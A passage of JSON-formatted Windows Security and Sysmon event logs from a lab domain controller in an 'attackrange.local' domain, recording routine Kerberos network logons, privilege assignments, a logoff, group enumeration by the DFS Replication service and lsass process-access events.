requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x640d6","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50135","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220420,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64111\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x64111","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220421,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x64111\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50135\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x64111","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50135","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220422,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6414A\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6414a","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220423,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x6414A\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50136\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x6414a","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50136","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220424,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x642A8\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x642a8","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220425,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x642A8\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50137\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x642a8","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50137","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220426,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x642A8\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x642a8","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4799,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":13826,"OpcodeValue":0,"RecordNumber":220427,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A security-enabled local group membership was enumerated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGroup:\r\n\tSecurity ID:\t\tS-1-5-32-544\r\n\tGroup Name:\t\tAdministrators\r\n\tGroup Domain:\t\tBuiltin\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0xb58\r\n\tProcess Name:\t\tC:\\Windows\\System32\\dfsrs.exe","Category":"Security Group Management","Opcode":"Info","TargetUserName":"Administrators","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","CallerProcessId":"0xb58","CallerProcessName":"C:\\Windows\\System32\\dfsrs.exe","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4215,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:37.313\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:37.313","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4799,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":13826,"OpcodeValue":0,"RecordNumber":220428,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"A security-enabled local group membership was enumerated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGroup:\r\n\tSecurity ID:\t\tS-1-5-32-551\r\n\tGroup Name:\t\tBackup Operators\r\n\tGroup Domain:\t\tBuiltin\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0xb58\r\n\tProcess Name:\t\tC:\\Windows\\System32\\dfsrs.exe","Category":"Security Group Management","Opcode":"Info","TargetUserName":"Backup Operators","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-551","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","CallerProcessId":"0xb58","CallerProcessName":"C:\\Windows\\System32\\dfsrs.exe","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4216,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:37.313\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:37.313","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
